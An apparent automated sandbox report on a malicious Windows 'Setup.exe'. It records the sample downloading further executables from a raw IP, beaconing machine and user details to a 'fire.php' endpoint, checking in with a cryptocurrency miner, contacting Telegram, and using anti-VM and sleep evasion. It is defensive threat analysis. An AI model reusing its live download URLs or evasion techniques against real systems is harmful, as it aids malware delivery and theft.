Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 11, 2023, 6:03 p.m.	Oct. 11, 2023, 6:05 p.m.

Size	395.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`aac23ff6c2cc93769600e060ab7cfca9`
SHA256	`ddeda215cd74d0d7516cd2862d6ef39d1329e5d06dc59f4b38f95a36b1c69bcd`
CRC32	`1789607C`
ssdeep	`6144:BldGJUaHy3IL1kBu+11KhwAORVGBapZ1LQumfF5Iuxr1T:Bly7HAILqv1Khw3Re11T`
PDB Path	F:\StryzonNet\Release\Setup.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check

Setup.exe "C:\Users\test22\AppData\Local\Temp\Setup.exe"
1884
- 1ouUD29mtM.exe "C:\ProgramData\1ouUD29mtM.exe"
  2552
- aYmedweIoO.exe "C:\ProgramData\aYmedweIoO.exe"
  2684
- qKtgwbeDWw.exe "C:\ProgramData\qKtgwbeDWw.exe"
  2740

Name	Response	Post-Analysis Lookup
ipapi.co	A 104.26.9.44 A 104.26.8.44 A 172.67.69.226	104.26.9.44
api.telegram.org	A 149.154.167.220	149.154.167.220
ip-api.com	A 208.95.112.1	208.95.112.1
api.ipify.org	A 173.231.16.77 A 64.185.227.156 CNAME api4.ipify.org A 104.237.62.212	104.237.62.212

IP Address	Status	Action
104.26.9.44	Active	Moloch
149.154.167.220	Active	Moloch
164.124.101.2	Active	Moloch
185.225.75.8	Active	Moloch
208.95.112.1	Active	Moloch
64.185.227.156	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49161 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 185.225.75.8:80 -> 192.168.56.103:49164	2525015	ET 3CORESec Poor Reputation IP group 16	Misc Attack
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 185.225.75.8:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.225.75.8:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
UDP 192.168.56.103:53673 -> 8.8.8.8:53	2033966	ET HUNTING Telegram API Domain in DNS Lookup	Misc activity
UDP 192.168.56.103:64894 -> 8.8.8.8:53	2024527	ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49169 -> 64.185.227.156:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 185.225.75.8:3333	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
UDP 192.168.56.103:50800 -> 8.8.8.8:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.103:49170 -> 104.26.9.44:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.225.75.8:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 149.154.167.220:443 -> 192.168.56.103:49171	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 149.154.167.220:443	2033967	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)	Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.220:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49171 -> 149.154.167.220:443	2033967	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)	Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.220:443	2033967	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)	Misc activity
TCP 192.168.56.103:49166 -> 185.225.75.8:3333	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49170 104.26.9.44:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	d9:cd:a6:ef:44:c8:7f:47:5e:47:97:00:58:f2:99:5e:14:e6:1c:cf

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA Oct. 11, 2023, 6:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 11, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 11, 2023, 6:04 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 11, 2023, 6:04 p.m.			0	0
IsDebuggerPresent Oct. 11, 2023, 6:04 p.m.			0	0
IsDebuggerPresent Oct. 11, 2023, 6:04 p.m.			0	0
IsDebuggerPresent Oct. 11, 2023, 6:04 p.m.			0	0
IsDebuggerPresent Oct. 11, 2023, 5:57 p.m.			0	0
IsDebuggerPresent Oct. 11, 2023, 5:57 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

F:\StryzonNet\Release\Setup.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 11, 2023, 5:57 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/build.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL2J1aWxkLmV4ZQ==
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/typhon.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL3R5cGhvbi5leGU=
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/cleanse.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL2NsZWFuc2UuZXhl
suspicious_features	GET method with no useragent header	suspicious_request	GET http://api.ipify.org/

Performs some HTTP requests (10 events)

request	GET http://ip-api.com/line/?fields=hosting
request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO
request	GET http://185.225.75.8/stryzon/build.exe
request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL2J1aWxkLmV4ZQ==
request	GET http://185.225.75.8/stryzon/typhon.exe
request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL3R5cGhvbi5leGU=
request	GET http://185.225.75.8/stryzon/cleanse.exe
request	GET http://185.225.75.8/stryzon/fire.php?id=Yjk4MzExNTAwY2U2MTAwZmIwMWNkMWJlN2FkNGI3ZGI=&us=dGVzdDIy&cn=VEVTVDIyLVBDIDogV2luZG93cyA3IFByb2Zlc3Npb25hbCBO&url=aHR0cDovLzE4NS4yMjUuNzUuOC9zdHJ5em9uL2NsZWFuc2UuZXhl
request	GET http://api.ipify.org/
request	GET https://ipapi.co/175.208.134.152/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 58 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2552 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c50000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2552 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000205c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2552 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000020a10000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2552 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000020b40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00455000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00521000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 6:04 p.m.	process_identifier: 2684 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2091000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef272b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2092000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2094000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2094000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2094000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2094000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 5:57 p.m.	process_identifier: 2740 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

Setup.exe tried to sleep 153 seconds, actually delayed analysis time by 153 seconds

Looks up the external IP address (2 events)

domain	api.ipify.org
domain	ip-api.com

Creates executable files on the filesystem (3 events)

file	C:\ProgramData\1ouUD29mtM.exe
file	C:\ProgramData\aYmedweIoO.exe
file	C:\ProgramData\qKtgwbeDWw.exe

Drops a binary and executes it (3 events)

file	C:\ProgramData\1ouUD29mtM.exe
file	C:\ProgramData\aYmedweIoO.exe
file	C:\ProgramData\qKtgwbeDWw.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\Setup.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BaseBoard
wmi	SELECT * FROM Win32_DiskDrive

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 11, 2023, 5:57 p.m.	flags: 14 family: 0		111	0

An executable file was downloaded by the process setup.exe (3 events)

Time & API	Arguments	Status	Return
